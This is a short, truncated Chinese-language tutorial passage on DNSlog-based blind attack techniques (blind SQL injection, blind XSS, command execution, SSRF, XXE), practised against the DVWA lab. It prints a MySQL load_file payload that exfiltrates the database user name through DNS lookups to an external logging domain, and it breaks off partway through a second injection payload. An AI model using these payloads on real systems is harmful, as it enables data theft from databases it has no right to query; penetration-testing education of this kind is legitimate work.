花5分钟就能上手的dnslog盲打小技巧！

作者：l1ch，转载于国科漏斗社区。 1.什么是dnslogDNSlog是什么？DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名www.baidu.com等的访问信息，类似日志文件 2.dnslog通常用在哪个地方1.SQL盲注2.无回显的XSS3.无回显的命令执行5.无回显的SSRF5.Blind XXE2.1.SQL盲注无论时时间盲注还是布尔盲注，都需要发送大量的数据包去判断数据，很容易导致被waf封IP，如果条件允许的话，可以使用dnslog进行快速的数据外带。以Mysql为例，通过dnslog外带数据需要用到load_file函数，所以一般得是root权限，并且secure_file_priv得为空payload：select load_file(concat('\\\\',(select hex(user())),'.dnslog\\aa'));注意：后面的aa文件存不存在不重要，随便写都行，但是必须要写，因为是load_file函数需要的条件以dvwa靶场为例（已手动修改：secure_file_priv=”)：payload:1' and (select load_file(concat('/ ………………………………